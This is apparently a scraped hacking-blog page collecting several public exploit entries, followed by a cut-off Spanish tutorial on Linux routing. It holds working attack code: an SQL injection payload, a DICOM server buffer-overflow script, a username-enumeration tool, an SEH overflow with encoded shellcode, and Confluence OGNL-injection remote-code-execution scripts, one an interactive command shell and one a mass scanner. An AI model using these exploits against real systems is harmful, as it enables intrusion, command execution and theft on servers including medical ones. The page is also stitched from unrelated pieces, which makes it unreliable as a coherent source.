# # # # #
# Exploit Title: Consumer Complaints Clone Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/consumer-complaints-clone-script/
# Demo: http://fxwebsolution.com/demo/consumer-complaints/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/other-user-profile.php?id=[SQL]
#
# -1'++/*!50000UNION*/(SELECT(1),/*!11111CONCAT_WS*/(0x203a20,USER(),VERSION()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+-
#
#
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863144875
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
#
# ConQuest DICOM Server 1.4.17d Remote Stack Buffer Overflow RCE
#
#
# Vendor: University of Manchester. Developed by Marcel van Herk, Lambert Zijp and Jan Meinders. The Netherlands Cancer Institute
# Product web page: https://ingenium.home.xs4all.nl/dicom.html | http://dicom.nema.org
# Affected version: 1.4.17d
# 1.4.19beta3a
# 1.4.19beta3b
#
# Summary: A full featured DICOM server has been developed based on the public
# domain UCDMC DICOM code. Some possible applications of the Conquest DICOM software
# are: DICOM training and testing; Demonstration image archives; Image format conversion
# from a scanner with DICOM network access; DICOM image slide making; DICOM image selection
# and (limited) editing; Automatic image forwarding and (de)compression.
#
# The vulnerability is caused due to the usage of vulnerable collection of libraries that
# are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL.
# Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length
# of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can
# overflow the stack and the heap of the process when sending large array of bytes to the presentation
# context item length segment of the DICOM standard, potentially resulting in remote code execution
# and/or denial of service scenario.
#
# ------------------------------------------------------------------------------
# 0:002> g
# (820.fc4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Downloads\dicomserver1419beta3b\dgate64.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Downloads\dicomserver1419beta3b\dgate64.exe
# dgate64+0xb9a29:
# 00000001`3fe09a29 488b5108 mov rdx,qword ptr [rcx+8] ds:42424242`4242424a=????????????????
# 0:002> r
# rax=0000000044444444 rbx=000000000298c910 rcx=4242424242424242
# rdx=000001400046001a rsi=0000000000001105 rdi=000000000041dc50
# rip=000000013fe09a29 rsp=000000000298b840 rbp=000000000298e8e4
# r8=000000000041dc40 r9=0000000000000402 r10=0000000000000281
# r11=0000013f004a0019 r12=0000000000003eb7 r13=0000000000000000
# r14=0000000000000000 r15=000000000298c910
# iopl=0 nv up ei pl nz na po nc
# cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# dgate64+0xb9a29:
# 00000001`3fe09a29 488b5108 mov rdx,qword ptr [rcx+8] ds:42424242`4242424a=????????????????
# 0:002> u
# dgate64+0xb9a29:
# 00000001`3fe09a29 488b5108 mov rdx,qword ptr [rcx+8]
# 00000001`3fe09a2d 488b4110 mov rax,qword ptr [rcx+10h]
# 00000001`3fe09a31 4885d2 test rdx,rdx
# 00000001`3fe09a34 7406 je dgate64+0xb9a3c (00000001`3fe09a3c)
# 00000001`3fe09a36 48894210 mov qword ptr [rdx+10h],rax
# 00000001`3fe09a3a eb04 jmp dgate64+0xb9a40 (00000001`3fe09a40)
# 00000001`3fe09a3c 48894328 mov qword ptr [rbx+28h],rax
# 00000001`3fe09a40 488b5110 mov rdx,qword ptr [rcx+10h]
# 0:002>
# dgate64+0xb9a44:
# 00000001`3fe09a44 488b4108 mov rax,qword ptr [rcx+8]
# 00000001`3fe09a48 4885d2 test rdx,rdx
# 00000001`3fe09a4b 7406 je dgate64+0xb9a53 (00000001`3fe09a53)
# 00000001`3fe09a4d 48894208 mov qword ptr [rdx+8],rax
# 00000001`3fe09a51 eb04 jmp dgate64+0xb9a57 (00000001`3fe09a57)
# 00000001`3fe09a53 48894330 mov qword ptr [rbx+30h],rax
# 00000001`3fe09a57 ba18000000 mov edx,18h
# 00000001`3fe09a5c e804caf4ff call dgate64+0x6465 (00000001`3fd56465)
# 0:002> kb e
# # RetAddr : Args to Child : Call Site
# 00 00000001`3fe104d2 : 00000000`00457a28 00000000`00008014 00000000`0298b8d9 00000000`00000000 : dgate64+0xb9a29
# 01 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : dgate64+0xc04d2
# 02 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 03 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 04 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 05 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 06 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 07 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 08 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 09 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 0a 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 0b 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 0c 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 0d 41414141`41414141 : 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 : 0x41414141`41414141
# 0:002> !exchain
# 100 stack frames, scanning for handlers...
# Frame 0x01: dgate64+0xc04d2 (00000001`3fe104d2)
# ehandler dgate64+0x552e (00000001`3fd5552e)
# Frame 0x02: error getting module for 4141414141414141
# Frame 0x03: error getting module for 4141414141414141
# Frame 0x04: error getting module for 4141414141414141
# Frame 0x05: error getting module for 4141414141414141
# Frame 0x06: error getting module for 4141414141414141
# Frame 0x07: error getting module for 4141414141414141
# Frame 0x08: error getting module for 4141414141414141
# Frame 0x09: error getting module for 4141414141414141
# Frame 0x0a: error getting module for 4141414141414141
# Frame 0x0b: error getting module for 4141414141414141
# Frame 0x0c: error getting module for 4141414141414141
# Frame 0x0d: error getting module for 4141414141414141
# Frame 0x0e: error getting module for 4141414141414141
# Frame 0x0f: error getting module for 4141414141414141
# Frame 0x10: error getting module for 4141414141414141
# Frame 0x11: error getting module for 4141414141414141
# Frame 0x12: error getting module for 4141414141414141
# Frame 0x13: error getting module for 4141414141414141
# Frame 0x14: error getting module for 4141414141414141
# Frame 0x15: error getting module for 4141414141414141
# Frame 0x16: error getting module for 4141414141414141
# ...
# ...
# Frame 0x61: error getting module for 4141414141414141
# Frame 0x62: error getting module for 4141414141414141
# Frame 0x63: error getting module for 4141414141414141
# 0:002> g
#
# STATUS_STACK_BUFFER_OVERRUN encountered
# (820.fc4): Break instruction exception - code 80000003 (first chance)
# kernel32!UnhandledExceptionFilter+0x71:
# 00000000`7796bb21 cc int 3
# 0:002> g
# ntdll!ZwWaitForSingleObject+0xa:
# 00000000`77a3bb7a c3 ret
#
# ------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
# Linux Ubuntu 14.04.5
# Solaris 10
# macOS/10.12.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5383
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5383.php
#
#
# 22.11.2016
#
import socket, sys
hello = ('\x01\x00\x00\x00\x80\x71\x00\x01\x00\x00\x4f\x52\x54\x48'
'\x41\x4e\x43\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4a\x4f'
'\x58\x59\x50\x4f\x58\x59\x21\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34'
'\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e'
'\x31\x20\x00\x80\x00')
# 33406 bytes
buffer = '\x41' * 20957 # STACK OVERFLOW / SEH OVERWRITE
buffer += '\x42' * 8 # RCX = 4242424242424242
buffer += '\x43' * 8 # defiler ;]
buffer += '\x44\x44\x44\x44' # EAX = 44444444 / RAX = 0000000044444444
buffer += '\x45' * 12429
bye = ('\x50\x00\x00\x0c\x51\x00\x00\x04\x00\x00\x07\xde'
'\x52\x00\x00\x00')
print 'Sending '+str(len(buffer))+' bytes of data!'
if len(sys.argv) < 3:
print '\nUsage: ' +sys.argv[0]+ ' <target> <port>'
print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 5678\n'
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(17)
s.send(hello+buffer+bye)
s.close
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration
# Date: 17/12/2021
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://www.connectwise.com/
# Version: vulnerable <= 19.2.24707
# CVE : CVE-2019-16516
# https://github.com/czz/ScreenConnect-UserEnum
from multiprocessing import Process, Queue
from statistics import mean
from urllib3 import exceptions as urlexcept
import argparse
import math
import re
import requests
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
headers = []
def header_function(header_line):
headers.append(header_line)
def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):
try:
# Payload to dictionary
payload_dict = {}
for load in payload:
split_load = load.split(":")
if split_load[1] != '{USER}':
payload_dict[split_load[0]] = split_load[1]
else:
payload_dict[split_load[0]] = '{USER}'
# Enumeration
total = len(wordlist)
for counter, user in enumerate(wordlist):
user_payload = dict(payload_dict)
for key, value in user_payload.items():
if value == '{USER}':
user_payload[key] = user
dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]
headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)
x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items())
if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')):
queue.put((proc_id, "FOUND", user))
found_queue.put((proc_id, "FOUND", user))
if stop: break
elif verbose:
queue.put((proc_id, "TRIED", user))
queue.put(("PERCENT", proc_id, (counter/total)*100))
except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):
print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id))
if __name__ == "__main__":
# Arguments
parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool")
parser.add_argument("url", help="http://example.com/Login")
parser.add_argument("wordlist", help="username wordlist")
parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems")
parser.add_argument("-v", action="store_true", help="verbose mode")
parser.add_argument("-s", action="store_true", help="stop on first user found")
parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050")
args = parser.parse_args()
# Arguments to simple variables
wordlist = args.wordlist
url = args.url
payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']
verbose = args.v
thread_count = args.c
failstr = "PasswordInvalid"
stop = args.s
proxy= args.p
print(bcolors.HEADER + """
__ ___ __ ___
| | |__ |__ |__) |__ |\ | | | |\/|
|__| ___| |___ | \ |___ | \| |__| | |
ScreenConnect POC by czz78 :)
"""+ bcolors.ENDC);
print("URL: "+url)
print("Payload: "+str(payload))
print("Fail string: "+failstr)
print("Wordlist: "+wordlist)
if verbose: print("Verbose mode")
if stop: print("Will stop on first user found")
proxies = {'http': '', 'https': ''}
if proxy:
proxies = {'http': proxy, 'https': proxy}
print("Initializing processes...")
# Distribute wordlist to processes
wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8
tothread = 0
wllist = [[] for i in range(thread_count)]
for user in wlfile:
wllist[tothread-1].append(user.strip())
if (tothread < thread_count-1):
tothread+=1
else:
tothread = 0
# Start processes
tries_q = Queue()
found_q = Queue()
processes = []
percentage = []
last_percentage = 0
for i in range(thread_count):
p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy))
processes.append(p)
percentage.append(0)
p.start()
print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC)
# Main process loop
initial_count = len(processes)
while True:
# Read the process output queue
try:
oldest = tries_q.get(False)
if oldest[0] == 'PERCENT':
percentage[oldest[1]] = oldest[2]
elif oldest[1] == 'FOUND':
print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
elif verbose:
print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
except: pass
# Calculate completion percentage and print if /10
total_percentage = math.ceil(mean(percentage))
if total_percentage % 10 == 0 and total_percentage != last_percentage:
print("{}% complete".format(total_percentage))
last_percentage = total_percentage
# Pop dead processes
for k, p in enumerate(processes):
if p.is_alive() == False:
processes.pop(k)
# Terminate all processes if -s flag is present
if len(processes) < initial_count and stop:
for p in processes:
p.terminate()
# Print results and terminate self if finished
if len(processes) == 0:
print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC)
while True:
try:
entry = found_q.get(False)
print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC)
except:
break
quit()
#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : Connectify Inc
#Version : Connectify Hotspot 2018
#Vendor Homepage : https://www.connectify.me/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc Connectify
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Connectify
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Connectify\ConnectifyService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Connectify Hotspot 2018
DEPENDENCIAS : wlansvc
: winmgmt
: http
NOMBRE_INICIO_SERVICIO: LocalSystem
#!/usr/bin/python
#Exploit Title:Congstar Internet-Manager SEH Buffer Overflow
#Software for usb Wireless:Congstar Prepaid Internet-Stick (MF100)
#Homepage:www.congstar.de/downloads/prepaid-internet-stick/
#Software Link:www.congstar.de/fileadmin/files_congstar/software/20100726_Congstar_Install%20Pakcage_WIN.zip
#Version:14.0.0.162
#Found:8.01.2015
#Exploit Author: metacom - twitter.com/m3tac0m
#Tested on: Windows 7 En
print "[*]Copy UpdateCfg.ini to C:\Program Files\congstar\Internetmanager\Bin\n"
print "[*]Open Program and go to Menu-Options \n"
print "[*]Click Update and press Now look for Update\n"
print "[*]DE --> Menu-->Einstellungen-->Aktualisierung-->Jetzt nach Aktualisierung suchen\n"
from struct import pack
buffer1 = "\x5b\x55\x50\x44\x41\x54\x45\x5d\x0a\x0a\x45\x4e\x41\x42\x4c\x45\x5f\x55\x50\x44\x41\x54\x45\x3d\x31\x0a\x0a\x55\x50\x44"
buffer1 += "\x41\x54\x45\x5f\x46\x52\x45\x51\x55\x45\x4e\x43\x45\x3d\x31\x34\x0a\x0a\x5b\x53\x65\x72\x76\x69\x63\x65\x5d\x0a\x0a\x53"
buffer1 += "\x65\x72\x76\x69\x63\x65\x55\x52\x4c\x3d\x68\x74\x74\x70\x73\x3a\x2f\x2f\x74\x6d\x6f\x62\x69\x6c\x65\x2e\x7a\x74\x65\x2e"
buffer1 += "\x63\x6f\x6d\x2e\x63\x6e\x2f\x55\x70\x64\x61\x74\x65\x45\x6e\x74\x72\x79\x2e\x61\x73\x70\x78\x0a"
junk="\x41" * 18164
nseh="\xeb\x06\x90\x90"
seh=pack('<I',0x7C3A1868)#7C3A1868
nops="\x90" * 100
#msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
#msfencode -e x86/alpha_upper -b "\x00\x0a\x0d\x1a\xff" -t c
shellcode=("\x89\xe2\xdd\xc1\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x55\x50"
"\x35\x50\x35\x50\x53\x50\x4d\x59\x4b\x55\x46\x51\x59\x42\x33"
"\x54\x4c\x4b\x56\x32\x30\x30\x4c\x4b\x31\x42\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x44\x32\x57\x58\x34\x4f\x38\x37\x50"
"\x4a\x51\x36\x46\x51\x4b\x4f\x30\x31\x49\x50\x4e\x4c\x47\x4c"
"\x33\x51\x43\x4c\x34\x42\x36\x4c\x31\x30\x49\x51\x48\x4f\x54"
"\x4d\x45\x51\x59\x57\x4d\x32\x4c\x30\x56\x32\x46\x37\x4c\x4b"
"\x31\x42\x44\x50\x4c\x4b\x31\x52\x57\x4c\x43\x31\x48\x50\x4c"
"\x4b\x51\x50\x53\x48\x4b\x35\x49\x50\x34\x34\x51\x5a\x53\x31"
"\x4e\x30\x36\x30\x4c\x4b\x50\x48\x52\x38\x4c\x4b\x36\x38\x47"
"\x50\x45\x51\x58\x53\x4b\x53\x57\x4c\x37\x39\x4c\x4b\x36\x54"
"\x4c\x4b\x33\x31\x39\x46\x30\x31\x4b\x4f\x56\x51\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x44\x4d\x55\x51\x49\x57\x37\x48\x4d\x30"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4a\x58\x37\x4b\x33\x4d\x57"
"\x54\x33\x45\x4b\x52\x30\x58\x4c\x4b\x36\x38\x57\x54\x33\x31"
"\x58\x53\x55\x36\x4c\x4b\x54\x4c\x30\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x35\x51\x58\x53\x4c\x4b\x55\x54\x4c\x4b\x33\x31\x38\x50"
"\x4b\x39\x57\x34\x31\x34\x46\x44\x51\x4b\x31\x4b\x53\x51\x30"
"\x59\x50\x5a\x46\x31\x4b\x4f\x4d\x30\x51\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x34\x52\x5a\x4b\x4c\x46\x31\x4d\x33\x5a\x43\x31\x4c"
"\x4d\x4c\x45\x38\x39\x55\x50\x45\x50\x43\x30\x50\x50\x53\x58"
"\x56\x51\x4c\x4b\x32\x4f\x4c\x47\x4b\x4f\x38\x55\x4f\x4b\x4b"
"\x4e\x44\x4e\x30\x32\x4a\x4a\x32\x48\x39\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x33\x36\x43\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x33\x35\x4f\x4b\x47\x37\x52\x33"
"\x54\x32\x32\x4f\x42\x4a\x43\x30\x46\x33\x4b\x4f\x49\x45\x52"
"\x43\x53\x51\x42\x4c\x53\x53\x46\x4e\x43\x55\x43\x48\x35\x35"
"\x43\x30\x41\x41")
poc="\n" + "UpdateReport" + "=" + junk + nseh + seh + nops + shellcode +"\n\n"
buffer2 = "\x53\x65\x72\x76\x69\x63\x65\x50\x6f\x72\x74\x3d\x34\x34\x33\x0a\x0a\x55\x50\x44\x41\x54\x45\x5f\x50\x41\x54\x48\x3d\x2e"
buffer2 += "\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x0a\x0a\x52\x45\x54\x52\x59\x5f\x43\x4f\x4e\x4e\x45\x43\x54\x3d\x33\x30\x30\x0a\x0a"
buffer2 += "\x52\x45\x54\x52\x59\x5f\x53\x4c\x45\x45\x50\x3d\x31\x0a\x0a\x43\x4f\x4e\x4e\x45\x43\x54\x5f\x54\x49\x4d\x45\x4f\x55\x54"
buffer2 += "\x3d\x32\x30\x0a\x0a\x5b\x55\x70\x64\x61\x74\x65\x4d\x6f\x64\x65\x5d\x0a\x0a\x4d\x6f\x64\x65\x53\x65\x6c\x65\x63\x74\x53"
buffer2 += "\x79\x73\x3d\x31\x0a"
exploit = buffer1 + poc + buffer2
try:
out_file = open("UpdateCfg.ini",'w')
out_file.write(exploit)
out_file.close()
except:
print "Error"
# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)
# Date: 01/09/2021
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros
# CVE : CVE-2021-26084
#!/usr/bin/python3
# References:
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
import requests
from bs4 import BeautifulSoup
import optparse
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x")
options, args = parser.parse_args()
session = requests.Session()
url_vuln = options.url
endpoint = options.path
if not options.url or not options.path:
print('[+] Specify an url target')
print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
print('[+] Example help usage: exploit.py -h')
exit()
def banner():
print('---------------------------------------------------------------')
print('[-] Confluence Server Webwork OGNL injection')
print('[-] CVE-2021-26084')
print('[-] https://github.com/h3v0x')
print('--------------------------------------------------------------- \n')
def cmdExec():
while True:
cmd = input('> ')
xpl_url = url_vuln + endpoint
xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip, deflate"}
xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)
soup = BeautifulSoup(rawHTML.text, 'html.parser')
queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
print(queryStringValue)
banner()
cmdExec()
# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 06/006/2022
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.4.17 versions before 7.18.1
# Tested on: -
# CVE : CVE-2022-26134
# https://github.com/h3v0x/CVE-2022-26134
#!/usr/bin/python3
import sys
import requests
import optparse
import multiprocessing
from requests.packages import urllib3
from requests.exceptions import MissingSchema, InvalidURL
urllib3.disable_warnings()
requestEngine = multiprocessing.Manager()
session = requests.Session()
global paramResults
paramResults = requestEngine.list()
globals().update(locals())
def spiderXpl(url):
globals().update(locals())
if not url.startswith('http'):
url='http://'+url
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"}
try:
response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
if(response.status_code == 302):
print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])
inputBuffer = str(response.headers['X-Cmd-Response'])
paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
else:
pass
except requests.exceptions.ConnectionError:
print('[x] Failed to Connect: '+url)
pass
except multiprocessing.log_to_stderr:
pass
except KeyboardInterrupt:
print('[!] Stoping exploit...')
exit(0)
except (MissingSchema, InvalidURL):
pass
def banner():
print('[-] CVE-2022-26134')
print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')
def main():
banner()
globals().update(locals())
sys.setrecursionlimit(100000)
if not optionsOpt.filehosts:
url = optionsOpt.url
spiderXpl(url)
else:
f = open(optionsOpt.filehosts)
urls = map(str.strip, f.readlines())
multiReq = multiprocessing.Pool(optionsOpt.threads_set)
try:
multiReq.map(spiderXpl, urls)
multiReq.close()
multiReq.join()
except UnboundLocalError:
pass
except KeyboardInterrupt:
exit(0)
if optionsOpt.output:
print("\n[!] Saving the output result in: %s" % optionsOpt.output)
with open(optionsOpt.output, "w") as f:
for result in paramResults:
f.write("%s\n" % result)
f.close()
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
optionsOpt, args = parser.parse_args()
main()
# Exploit Title: Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 07-03-2021
# Vendor Homepage: https://www.oki.com
# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46226801&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6
# Tested Version: 1.6.53
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 8.1 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
OKI Local Port Manager OpLclSrv C:\Program
Files\Okidata\Common\extend3\portmgrsrv.exe Auto
C:\>sc qc OpLclSrv [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO:
OpLclSrv TIPO: 10 WIN32_OWN_PROCESS TIPO_INICIO: 2 AUTO_START
CONTROL_ERROR: 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program
Files\Okidata\Common\extend3\portmgrsrv.exe GRUPO_ORDEN_CARGA: ETIQUETA: 0
NOMBRE_MOSTRAR: OKI Local Port Manager DEPENDENCIAS:
NOMBRE_INICIO_SERVICIO: LocalSystem
Podemos configurar un Linux como router de forma bastante sencilla. La idea, es comprobar si en la máquina Linux que usaremos como router, está el IP Forwarding activado, que es lo que permite el reenvío de paquetes. Por defecto, esta configuración estará desactivada.
Para este post estaremos usando las siguientes máquinas:
- 3 Equipos:
- Kali –> Mi equipo de atacante
- IP: 192.168.10.10
- Debian 1 –> Actuará como Router
